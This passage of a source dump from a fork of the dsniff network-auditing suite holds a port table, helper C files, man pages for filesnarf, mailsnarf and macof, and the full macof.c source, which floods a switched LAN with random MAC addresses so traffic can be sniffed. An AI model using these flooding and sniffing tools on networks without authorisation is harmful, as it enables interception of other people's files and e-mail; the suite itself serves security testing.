{"sniffer", 2001, DSNIFF_SERVICE_udp}, 54 | {"cvs", 2401, DSNIFF_SERVICE_tcp}, 55 | {"mmxp", 2417, DSNIFF_SERVICE_tcp}, 56 | {"mmxp", 2417, DSNIFF_SERVICE_udp}, 57 | {"tds", 2638, DSNIFF_SERVICE_tcp}, 58 | {"http", 3128, DSNIFF_SERVICE_tcp}, 59 | //{"icq", 4000, DSNIFF_SERVICE_udp}, 60 | //{"napster", 4444, DSNIFF_SERVICE_tcp}, 61 | // {"aim", 5190, DSNIFF_SERVICE_tcp}, 62 | {"postgresql", 5432, DSNIFF_SERVICE_tcp}, 63 | // {"napster", 5555, DSNIFF_SERVICE_tcp}, 64 | {"pcanywhere", 5631, DSNIFF_SERVICE_tcp}, 65 | {"x11", 6000, DSNIFF_SERVICE_tcp}, 66 | {"x11", 6001, DSNIFF_SERVICE_tcp}, 67 | {"x11", 6002, DSNIFF_SERVICE_tcp}, 68 | {"x11", 6003, DSNIFF_SERVICE_tcp}, 69 | {"x11", 6004, DSNIFF_SERVICE_tcp}, 70 | {"x11", 6005, DSNIFF_SERVICE_tcp}, 71 | // {"napster", 6666, DSNIFF_SERVICE_tcp}, 72 | {"irc", 6667, DSNIFF_SERVICE_tcp}, 73 | {"irc", 6668, DSNIFF_SERVICE_tcp}, 74 | {"irc", 6669, DSNIFF_SERVICE_tcp}, 75 | {"tds", 7599, DSNIFF_SERVICE_tcp}, 76 | // {"napster", 7777, DSNIFF_SERVICE_tcp}, 77 | {"http", 8080, DSNIFF_SERVICE_tcp}, 78 | // {"napster", 8888, DSNIFF_SERVICE_tcp}, 79 | // {"aim", 9898, DSNIFF_SERVICE_tcp}, 80 | {"pcanywhere", 65301, DSNIFF_SERVICE_tcp}, 81 | {"mountd", 100005, DSNIFF_SERVICE_rpc}, 82 | {"ypserv", 100004, DSNIFF_SERVICE_rpc}, 83 | {"yppasswd", 100009, DSNIFF_SERVICE_rpc} 84 | }; -------------------------------------------------------------------------------- /env2argv.c: -------------------------------------------------------------------------------- 1 | #include "config.h" 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | #include "env2argv.h" 8 | 9 | #define ARGS_NAME "ENV_ARGS" 10 | 11 | // Add list of argv's from environment to argv[]. 12 | // Result: argv[0] + ENV_ARGS[@] + argv[1..n] 13 | void 14 | env2argv(int *argcptr, char **argvptr[]) { 15 | char *str_orig = getenv(ARGS_NAME); 16 | char *str = NULL; 17 | char *next; 18 | char **newargv = NULL; 19 | int newargc = 0; 20 | 21 | if ((str_orig == NULL) || (*str_orig == '\0')) 22 | return; 23 | 24 | str = strdup(str_orig); 25 | next = str; 26 | 27 | newargv = malloc(1 * sizeof *argvptr); 28 | memcpy(&newargv[0], argvptr[0], 1 * sizeof *argvptr); 29 | newargc = 1; 30 | 31 | while (next != NULL) { 32 | while (*str == ' ') 33 | str++; 34 | 35 | next = strchr(str, ' '); 36 | if (next != NULL) { 37 | *next = 0; 38 | next++; 39 | } 40 | // catch if last character is ' ' 41 | if (strlen(str) > 0) { 42 | /* *next == '\0'; str points to argument (0-terminated) */ 43 | newargc++; 44 | // DEBUGF("%d. arg = '%s'\n", newargc, str); 45 | newargv = realloc(newargv, newargc * sizeof newargv); 46 | newargv[newargc - 1] = str; 47 | } 48 | 49 | str = next; 50 | if (str == NULL) 51 | break; 52 | } 53 | 54 | // Copy original argv[1..n] 55 | newargv = realloc(newargv, (newargc + *argcptr) * sizeof newargv); 56 | memcpy(newargv + newargc, *argvptr + 1, (*argcptr - 1) * sizeof *argvptr); 57 | 58 | newargc += (*argcptr - 1); 59 | newargv[newargc] = NULL; 60 | 61 | *argcptr = newargc; 62 | *argvptr = newargv; 63 | } -------------------------------------------------------------------------------- /env2argv.h: -------------------------------------------------------------------------------- 1 | #ifndef __ENV2ARGV_H__ 2 | #define __ENV2ARGV_H__ 1 3 | 4 | void env2argv(int *argcptr, char **argvptr[]); 5 | 6 | #endif /* __ENV2ARGV_H__ */ 7 | -------------------------------------------------------------------------------- /filesnarf.8: -------------------------------------------------------------------------------- 1 | .TH FILESNARF 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | filesnarf 6 | \- 7 | sniff files from NFS traffic 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBfilesnarf\fR [\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] [[\fB-v\fR] \fIpattern [\fIexpression\fR]] 13 | .SH DESCRIPTION 14 | .ad 15 | .fi 16 | \fBfilesnarf\fR saves files sniffed from NFS traffic in the current 17 | working directory. 18 | .SH OPTIONS 19 | .IP "\fB-i \fIinterface\fR" 20 | Specify the interface to listen on. 21 | .IP "\fB-p \fIpcapfile\fR" 22 | Process packets from the specified PCAP capture file instead of the network. 23 | .IP \fB-v\fR 24 | "Versus" mode. Invert the sense of matching, to select non-matching 25 | files. 26 | .IP \fIpattern\fR 27 | Specify regular expression for filename matching. 28 | .IP "\fIexpression\fR" 29 | Specify a tcpdump(8) filter expression to select traffic to sniff. 30 | .SH "SEE ALSO" 31 | dsniff(8), nfsd(8) 32 | .SH AUTHOR 33 | .na 34 | .nf 35 | Dug Song 36 | -------------------------------------------------------------------------------- /hex.c: -------------------------------------------------------------------------------- 1 | /* 2 | * hex.c 3 | * 4 | * Copyright (c) 2000 Dug Song 5 | * 6 | * $Id: hex.c,v 1.5 2001/03/15 08:33:03 dugsong Exp $ 7 | */ 8 | 9 | #include "config.h" 10 | 11 | #include 12 | 13 | #include 14 | #include 15 | #include 16 | 17 | #include "hex.h" 18 | 19 | int 20 | hex_decode(char *src, int srclen, u_char *dst, int dstlen) 21 | { 22 | char *p, *pe; 23 | u_char *q, *qe, ch, cl; 24 | 25 | pe = src + srclen; 26 | qe = dst + dstlen; 27 | 28 | if (strncmp(src, "0x", 2) == 0) 29 | src += 2; 30 | 31 | for (p = src, q = dst; p < pe && q < qe && isxdigit((int)*p); p += 2) { 32 | ch = tolower(p[0]); 33 | cl = tolower(p[1]); 34 | 35 | if ((ch >= '0') && (ch <= '9')) ch -= '0'; 36 | else if ((ch >= 'a') && (ch <= 'f')) ch -= 'a' - 10; 37 | else return (-1); 38 | 39 | if ((cl >= '0') && (cl <= '9')) cl -= '0'; 40 | else if ((cl >= 'a') && (cl <= 'f')) cl -= 'a' - 10; 41 | else return (-1); 42 | 43 | *q++ = (ch << 4) | cl; 44 | } 45 | return (q - dst); 46 | } 47 | 48 | /* adapted from OpenBSD tcpdump: dump the buffer in emacs-hexl format */ 49 | void 50 | hex_print(const u_char *buf, int len, int offset) 51 | { 52 | u_int i, j, jm; 53 | int c; 54 | 55 | printf("\n"); 56 | for (i = 0; i < len; i += 0x10) { 57 | printf(" %04x: ", (u_int)(i + offset)); 58 | jm = len - i; 59 | jm = jm > 16 ? 16 : jm; 60 | 61 | for (j = 0; j < jm; j++) { 62 | if ((j % 2) == 1) printf("%02x ", (u_int) buf[i+j]); 63 | else printf("%02x", (u_int) buf[i+j]); 64 | } 65 | for (; j < 16; j++) { 66 | if ((j % 2) == 1) printf(" "); 67 | else printf(" "); 68 | } 69 | printf(" "); 70 | 71 | for (j = 0; j < jm; j++) { 72 | c = buf[i+j]; 73 | c = isprint(c) ? c : '.'; 74 | printf("%c", c); 75 | } 76 | printf("\n"); 77 | } 78 | } 79 | 80 | -------------------------------------------------------------------------------- /hex.h: -------------------------------------------------------------------------------- 1 | /* 2 | * hex.h 3 | * 4 | * Hexadecimal conversion routines. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: hex.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $ 9 | */ 10 | 11 | #ifndef HEX_H 12 | #define HEX_H 13 | 14 | int hex_decode(char *src, int srclen, u_char *buf, int len); 15 | 16 | void hex_print(const u_char *buf, int len, int offset); 17 | 18 | #endif /* HEX_H */ 19 | 20 | -------------------------------------------------------------------------------- /macof.8: -------------------------------------------------------------------------------- 1 | .TH MACOF 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | macof 6 | \- 7 | flood a switched LAN with random MAC addresses 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBmacof\fR [\fB-i \fIinterface\fR] [\fB-s \fIsrc\fR] 13 | [\fB-d \fIdst\fR] [\fB-e \fItha\fR] [\fB-x \fIsport\fR] [\fB-y \fIdport\fR] 14 | [\fB-n \fItimes\fR] 15 | .SH DESCRIPTION 16 | .ad 17 | .fi 18 | \fBmacof\fR floods the local network with random MAC addresses 19 | (causing some switches to fail open in repeating mode, facilitating 20 | sniffing). A straight C port of the original Perl Net::RawIP macof 21 | program by Ian Vitek . 22 | .SH OPTIONS 23 | .IP "\fB-i \fIinterface\fR" 24 | Specify the interface to send on. 25 | .IP "\fB-s \fIsrc\fR" 26 | Specify source IP address. 27 | .IP "\fB-d \fIdst\fR" 28 | Specify destination IP address. 29 | .IP "\fB-e \fItha\fR" 30 | Specify target hardware address. 31 | .IP "\fB-x \fIsport\fR" 32 | Specify TCP source port. 33 | .IP "\fB-y \fIdport\fR" 34 | Specify TCP destination port. 35 | .IP "\fB-n \fItimes\fR" 36 | Specify the number of packets to send. 37 | .LP 38 | Values for any options left unspecified will be generated randomly. 39 | .SH "SEE ALSO" 40 | dsniff(8) 41 | .SH AUTHOR 42 | .na 43 | .nf 44 | Dug Song 45 | -------------------------------------------------------------------------------- /macof.c: -------------------------------------------------------------------------------- 1 | /* 2 | * macof.c 3 | * 4 | * C port of macof-1.1 from the Perl Net::RawIP distribution. 5 | * Tests network devices by flooding local network with MAC-addresses. 6 | * 7 | * Perl macof originally written by Ian Vitek . 8 | * 9 | * Copyright (c) 1999 Dug Song 10 | * 11 | * $Id: macof.c,v 1.15 2001/03/15 08:33:04 dugsong Exp $ 12 | */ 13 | 14 | #include "config.h" 15 | 16 | #include 17 | #include 18 | #include 19 | 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | 26 | 27 | extern char *ether_ntoa(struct ether_addr *); 28 | extern struct ether_addr *ether_aton(char *); 29 | 30 | in_addr_t Src = 0; 31 | in_addr_t Dst = 0; 32 | u_char *Tha = NULL; 33 | u_short Dport = 0; 34 | u_short Sport = 0; 35 | char *Intf = NULL; 36 | int Repeat = -1; 37 | 38 | static void 39 | usage(void) 40 | { 41 | fprintf(stderr, "Version: " VERSION "\n" 42 | "Usage: macof [-s src] [-d dst] [-e tha] [-x sport] [-y dport]" 43 | "\n [-i interface] [-n times]\n"); 44 | exit(1); 45 | } 46 | 47 | static void 48 | gen_mac(u_char *mac) 49 | { 50 | *((in_addr_t *)mac) = libnet_get_prand(LIBNET_PRu32); 51 | *((u_short *)(mac + 4)) = libnet_get_prand(LIBNET_PRu16); 52 | } 53 | 54 | int 55 | main(int argc, char *argv[]) 56 | { 57 | extern char *optarg; 58 | extern int optind; 59 | int c, i; 60 | struct libnet_link_int *llif; 61 | char pcap_ebuf[PCAP_ERRBUF_SIZE]; 62 | char libnet_ebuf[LIBNET_ERRBUF_SIZE]; 63 | u_char sha[ETHER_ADDR_LEN], tha[ETHER_ADDR_LEN]; 64 | in_addr_t src, dst; 65 | u_short sport, dport; 66 | u_int32_t seq; 67 | libnet_t *l; 68 | 69 | while ((c = getopt(argc, argv, "vs:d:e:x:y:i:n:h?V")) != -1) { 70 | switch (c) { 71 | case 'v': 72 | break; 73 | case 's': 74 | Src = libnet_name2addr4(l, optarg, 0); 75 | break; 76 | case 'd': 77 | Dst = libnet_name2addr4(l, optarg, 0); 78 | break; 79 | case 'e': 80 | Tha = (u_char *)ether_aton(optarg); 81 | break; 82 | case 'x': 83 | Sport = atoi(optarg); 84 | break; 85 | case 'y': 86 | Dport = atoi(optarg); 87 | break; 88 | case 'i': 89 | Intf = optarg; 90 | break; 91 | case 'n': 92 | Repeat = atoi(optarg); 93 | break; 94 | default: 95 | usage(); 96 | } 97 | } 98 | argc -= optind; 99 | argv += optind; 100 | 101 | if (argc != 0) 102 | usage(); 103 | 104 | if (!Intf && (Intf = pcap_lookupdev(pcap_ebuf)) == NULL) 105 | errx(1, "%s", pcap_ebuf); 106 | 107 | if ((l = libnet_init(LIBNET_LINK, Intf, libnet_ebuf)) == NULL) 108 | errx(1, "%s", libnet_ebuf); 109 | 110 | libnet_seed_prand(l); 111 | 112 | for (i = 0; i != Repeat; i++) { 113 | 114 | gen_mac(sha); 115 | 116 | if (Tha == NULL) gen_mac(tha); 117 | else memcpy(tha, Tha, sizeof(tha)); 118 | 119 | if (Src != 0) src = Src; 120 | else src = libnet_get_prand(LIBNET_PRu32); 121 | 122 | if (Dst != 0) dst = Dst; 123 | else dst = libnet_get_prand(LIBNET_PRu32); 124 | 125 | if (Sport != 0) sport = Sport; 126 | else sport = libnet_get_prand(LIBNET_PRu16); 127 | 128 | if (Dport != 0) dport = Dport; 129 | else dport = libnet_get_prand(LIBNET_PRu16); 130 | 131 | seq = libnet_get_prand(LIBNET_PRu32); 132 | 133 | libnet_build_tcp(sport, dport, seq, 0, TH_SYN, 512, 134 | 0, 0, LIBNET_TCP_H, NULL, 0, l, 0); 135 | 136 | libnet_build_ipv4(LIBNET_TCP_H, 0, 137 | libnet_get_prand(LIBNET_PRu16), 0, 64, 138 | IPPROTO_TCP, 0, src, dst, NULL, 0, l, 0); 139 | 140 | libnet_build_ethernet(tha, sha, ETHERTYPE_IP, NULL, 0, l, 0); 141 | 142 | if (libnet_write(l) < 0) 143 | errx(1, "write"); 144 | 145 | libnet_clear_packet(l); 146 | 147 | fprintf(stderr, "%s ", 148 | ether_ntoa((struct ether_addr *)sha)); 149 | fprintf(stderr, "%s %s.%d > %s.%d: S %u:%u(0) win 512\n", 150 | ether_ntoa((struct ether_addr *)tha), 151 | libnet_addr2name4(Src, 0), sport, 152 | libnet_addr2name4(Dst, 0), dport, seq, seq); 153 | } 154 | exit(0); 155 | } 156 | -------------------------------------------------------------------------------- /magic.h: -------------------------------------------------------------------------------- 1 | /* 2 | * magic.h 3 | * 4 | * Network application protocol identification, based on file(1) magic. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: magic.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $ 9 | */ 10 | 11 | #ifndef MAGIC_H 12 | #define MAGIC_H 13 | 14 | void magic_init(char *filename); 15 | 16 | char *magic_match(u_char *buf, int len); 17 | 18 | #endif /* MAGIC_H */ 19 | -------------------------------------------------------------------------------- /mailsnarf.8: -------------------------------------------------------------------------------- 1 | .TH MAILSNARF 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | mailsnarf 6 | \- 7 | sniff mail messages in Berkeley mbox format 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBmailsnarf\fR [\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] [[\fB-v\fR] \fIpattern [\fIexpression\fR]] 13 | .SH DESCRIPTION 14 | .ad 15 | .fi 16 | \fBmailsnarf\fR outputs e-mail messages sniffed from SMTP and POP 17 | traffic in Berkeley mbox format, suitable for offline browsing with 18 | your favorite mail reader (mail(1), pine(1), etc.). 19 | .SH OPTIONS 20 | .IP "\fB-i \fIinterface\fR" 21 | Specify the interface to listen on. 22 | .IP "\fB-p \fIpcapfile\fR" 23 | Process packets from the specified PCAP capture file instead of the network. 24 | .IP \fB-v\fR 25 | "Versus" mode. Invert the sense of matching, to select non-matching 26 | messages. 27 | .IP \fIpattern\fR 28 | Specify regular expression for message header/body matching. 29 | .IP "\fIexpression\fR" 30 | Specify a tcpdump(8) filter expression to select traffic to sniff. 31 | .SH "SEE ALSO" 32 | dsniff(8), mail(1), pine(1) 33 | .SH AUTHOR 34 | .na 35 | .nf 36 | Dug Song 37 | -------------------------------------------------------------------------------- /missing/dirname.c: -------------------------------------------------------------------------------- 1 | /* $Id: dirname.c,v 1.1 2000/04/08 20:50:28 dugsong Exp $ */ 2 | /* $OpenBSD: dirname.c,v 1.4 1999/05/30 17:10:30 espie Exp $ */ 3 | 4 | /* 5 | * Copyright (c) 1997 Todd C. Miller 6 | * All rights reserved. 7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 3. The name of the author may not be used to endorse or promote products 17 | * derived from this software without specific prior written permission. 18 | * 19 | * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, 20 | * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY 21 | * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL 22 | * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 23 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 24 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 25 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 26 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 27 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 28 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 29 | */ 30 | 31 | #include 32 | #include 33 | #include 34 | 35 | char * 36 | dirname(path) 37 | const char *path; 38 | { 39 | static char bname[MAXPATHLEN]; 40 | register const char *endp; 41 | 42 | /* Empty or NULL string gets treated as "." */ 43 | if (path == NULL || *path == '\0') { 44 | (void)strcpy(bname, "."); 45 | return(bname); 46 | } 47 | 48 | /* Strip trailing slashes */ 49 | endp = path + strlen(path) - 1; 50 | while (endp > path && *endp == '/') 51 | endp--; 52 | 53 | /* Find the start of the dir */ 54 | while (endp > path && *endp != '/') 55 | endp--; 56 | 57 | /* Either the dir is "/" or there are no slashes */ 58 | if (endp == path) { 59 | (void)strcpy(bname, *endp == '/' ? "/" : "."); 60 | return(bname); 61 | } else { 62 | do { 63 | endp--; 64 | } while (endp > path && *endp == '/'); 65 | } 66 | 67 | if (endp - path + 1 > sizeof(bname)) { 68 | errno = ENAMETOOLONG; 69 | return(NULL); 70 | } 71 | (void)strncpy(bname, path, endp - path + 1); 72 | bname[endp - path + 1] = '\0'; 73 | return(bname); 74 | } 75 | -------------------------------------------------------------------------------- /missing/dummy.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerschoice/dsniff/da38bf437899cc1fbb8d7590a5f62c53a2f411fa/missing/dummy.c -------------------------------------------------------------------------------- /missing/err.c: -------------------------------------------------------------------------------- 1 | /* 2 | * err.c 3 | * 4 | * Adapted from OpenBSD libc *err* *warn* code. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * Copyright (c) 1993 9 | * The Regents of the University of California. All rights reserved. 10 | * 11 | * Redistribution and use in source and binary forms, with or without 12 | * modification, are permitted provided that the following conditions 13 | * are met: 14 | * 1. Redistributions of source code must retain the above copyright 15 | * notice, this list of conditions and the following disclaimer. 16 | * 2. Redistributions in binary form must reproduce the above copyright 17 | * notice, this list of conditions and the following disclaimer in the 18 | * documentation and/or other materials provided with the distribution. 19 | * 3. All advertising materials mentioning features or use of this software 20 | * must display the following acknowledgement: 21 | * This product includes software developed by the University of 22 | * California, Berkeley and its contributors. 23 | * 4. Neither the name of the University nor the names of its contributors 24 | * may be used to endorse or promote products derived from this software 25 | * without specific prior written permission. 26 | * 27 | * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND 28 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 29 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 30 | * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE 31 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 32 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 33 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 34 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 35 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 36 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 37 | * SUCH DAMAGE. 38 | */ 39 | 40 | #include 41 | #include 42 | #include 43 | #include 44 | #include 45 | 46 | void 47 | err(int eval, const char *fmt, ...) 48 | { 49 | va_list ap; 50 | 51 | va_start(ap, fmt); 52 | if (fmt != NULL) { 53 | (void)vfprintf(stderr, fmt, ap); 54 | (void)fprintf(stderr, ": "); 55 | } 56 | va_end(ap); 57 | (void)fprintf(stderr, "%s\n", strerror(errno)); 58 | exit(eval); 59 | } 60 | 61 | void 62 | warn(const char *fmt, ...) 63 | { 64 | va_list ap; 65 | 66 | va_start(ap, fmt); 67 | if (fmt != NULL) { 68 | (void)vfprintf(stderr, fmt, ap); 69 | (void)fprintf(stderr, ": "); 70 | } 71 | va_end(ap); 72 | (void)fprintf(stderr, "%s\n", strerror(errno)); 73 | } 74 | 75 | void 76 | errx(int eval, const char *fmt, ...) 77 | { 78 | va_list ap; 79 | 80 | va_start(ap, fmt); 81 | if (fmt != NULL) 82 | (void)vfprintf(stderr, fmt, ap); 83 | (void)fprintf(stderr, "\n"); 84 | va_end(ap); 85 | exit(eval); 86 | } 87 | 88 | void 89 | warnx(const char *fmt, ...) 90 | { 91 | va_list ap; 92 | 93 | va_start(ap, fmt); 94 | if (fmt != NULL) 95 | (void)vfprintf(stderr, fmt, ap); 96 | (void)fprintf(stderr, "\n"); 97 | va_end(ap); 98 | } 99 | 100 | -------------------------------------------------------------------------------- /missing/err.h: -------------------------------------------------------------------------------- 1 | /* 2 | * err.h 3 | * 4 | * Adapted from OpenBSD libc *err* *warn* code. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * Copyright (c) 1993 9 | * The Regents of the University of California. All rights reserved. 10 | * 11 | * Redistribution and use in source and binary forms, with or without 12 | * modification, are permitted provided that the following conditions 13 | * are met: 14 | * 1. Redistributions of source code must retain the above copyright 15 | * notice, this list of conditions and the following disclaimer. 16 | * 2. Redistributions in binary form must reproduce the above copyright 17 | * notice, this list of conditions and the following disclaimer in the 18 | * documentation and/or other materials provided with the distribution. 19 | * 3. All advertising materials mentioning features or use of this software 20 | * must display the following acknowledgement: 21 | * This product includes software developed by the University of 22 | * California, Berkeley and its contributors. 23 | * 4. Neither the name of the University nor the names of its contributors 24 | * may be used to endorse or promote products derived from this software 25 | * without specific prior written permission. 26 | * 27 | * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND 28 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 29 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 30 | * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE 31 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 32 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 33 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 34 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 35 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 36 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 37 | * SUCH DAMAGE. 38 | * 39 | * @(#)err.h 8.1 (Berkeley) 6/2/93 40 | */ 41 | 42 | #ifndef _ERR_H_ 43 | #define _ERR_H_ 44 | 45 | void err(int eval, const char *fmt, ...); 46 | void warn(const char *fmt, ...); 47 | void errx(int eval, const char *fmt, ...); 48 | void warnx(const char *fmt, ...); 49 | 50 | #endif /* !_ERR_H_ */ 51 | -------------------------------------------------------------------------------- /missing/ethers.c: -------------------------------------------------------------------------------- 1 | /* $Id: ethers.c,v 1.1 2000/04/08 20:50:28 dugsong Exp $ */ 2 | /* $OpenBSD: ethers.c,v 1.10 1998/11/18 23:28:54 deraadt Exp $ */ 3 | 4 | /* 5 | * Copyright (c) 1998 Todd C. Miller 6 | * All rights reserved. 7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 3. The name of the author may not be used to endorse or promote products 17 | * derived from this software without specific prior written permission. 18 | * 19 | * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, 20 | * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY 21 | * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL 22 | * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 23 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 24 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 25 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 26 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 27 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 28 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 29 | */ 30 | 31 | /* 32 | * ethers(3) a la Sun. 33 | * Originally Written by Roland McGrath 10/14/93. 34 | * Substantially modified by Todd C. Miller 35 | */ 36 | 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include 42 | #include 43 | #include 44 | #include 45 | #include 46 | #include 47 | 48 | char * 49 | ether_ntoa(e) 50 | struct ether_addr *e; 51 | { 52 | static char a[] = "xx:xx:xx:xx:xx:xx"; 53 | 54 | if (e->ether_addr_octet[0] > 0xFF || e->ether_addr_octet[1] > 0xFF || 55 | e->ether_addr_octet[2] > 0xFF || e->ether_addr_octet[3] > 0xFF || 56 | e->ether_addr_octet[4] > 0xFF || e->ether_addr_octet[5] > 0xFF) { 57 | errno = EINVAL; 58 | return (NULL); 59 | } 60 | 61 | (void)sprintf(a, "%02x:%02x:%02x:%02x:%02x:%02x", 62 | e->ether_addr_octet[0], e->ether_addr_octet[1], 63 | e->ether_addr_octet[2], e->ether_addr_octet[3], 64 | e->ether_addr_octet[4], e->ether_addr_octet[5]); 65 | 66 | return (a); 67 | } 68 | 69 | static char * 70 | _ether_aton(s, e) 71 | char *s; 72 | struct ether_addr *e; 73 | { 74 | int i; 75 | long l; 76 | char *pp; 77 | 78 | while (isspace(*s)) 79 | s++; 80 | 81 | /* expect 6 hex octets separated by ':' or space/NUL if last octet */ 82 | for (i = 0; i < 6; i++) { 83 | l = strtol(s, &pp, 16); 84 | if (pp == s || l > 0xFF || l < 0) 85 | return (NULL); 86 | if (!(*pp == ':' || (i == 5 && (isspace(*pp) || *pp == '\0')))) 87 | return (NULL); 88 | e->ether_addr_octet[i] = (u_char)l; 89 | s = pp + 1; 90 | } 91 | 92 | /* return character after the octets ala strtol(3) */ 93 | return (pp); 94 | } 95 | 96 | struct ether_addr * 97 | ether_aton(s) 98 | char *s; 99 | { 100 | static struct ether_addr n; 101 | 102 | return (_ether_aton(s, &n) ? &n : NULL); 103 | } 104 | 105 | -------------------------------------------------------------------------------- /missing/libgen.h: -------------------------------------------------------------------------------- 1 | /* 2 | * libgen.h 3 | * 4 | * Adapted from OpenBSD libc *err* *warn* code. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * Copyright (c) 1997 Todd C. Miller 9 | * All rights reserved. 10 | * 11 | * Redistribution and use in source and binary forms, with or without 12 | * modification, are permitted provided that the following conditions 13 | * are met: 14 | * 1. Redistributions of source code must retain the above copyright 15 | * notice, this list of conditions and the following disclaimer. 16 | * 2. Redistributions in binary form must reproduce the above copyright 17 | * notice, this list of conditions and the following disclaimer in the 18 | * documentation and/or other materials provided with the distribution. 19 | * 3. The name of the author may not be used to endorse or promote products 20 | * derived from this software without specific prior written permission. 21 | * 22 | * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, 23 | * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY 24 | * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL 25 | * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 26 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 27 | * PROCUREMENT OF 